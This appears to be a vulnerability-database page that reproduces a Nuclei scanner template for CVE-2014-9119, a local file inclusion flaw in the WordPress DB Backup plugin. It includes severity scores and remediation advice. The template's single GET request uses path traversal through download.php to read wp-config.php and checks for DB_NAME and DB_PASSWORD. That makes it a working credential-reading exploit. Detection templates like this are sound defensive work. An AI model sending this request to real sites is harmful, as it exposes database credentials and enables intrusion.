Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-9119
HistoryFeb 12, 2022 - 5:04 p.m.

WordPress DB Backup <=4.5 - Local File Inclusion

2022-02-1217:04:53
ProjectDiscovery
github.com
9
cve2014
lfi
wordpress
wp-plugin
backup
wpscan
edb
db_backup_project

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

5.8

Confidence

High

EPSS

0.113

Percentile

95.2%

WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
id: CVE-2014-9119

info:
  name: WordPress DB Backup <=4.5 - Local File Inclusion
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
  impact: |
    Allows an attacker to read arbitrary files on the server.
  remediation: |
    Update WordPress DB Backup plugin to version 4.6 or higher.
  reference:
    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
    - https://www.exploit-db.com/exploits/35378
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
    - https://wpvulndb.com/vulnerabilities/7726
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-9119
    cwe-id: CWE-22
    epss-score: 0.11639
    epss-percentile: 0.95149
    cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: db_backup_project
    product: db_backup
    framework: wordpress
  tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

5.8

Confidence

High

EPSS

0.113

Percentile

95.2%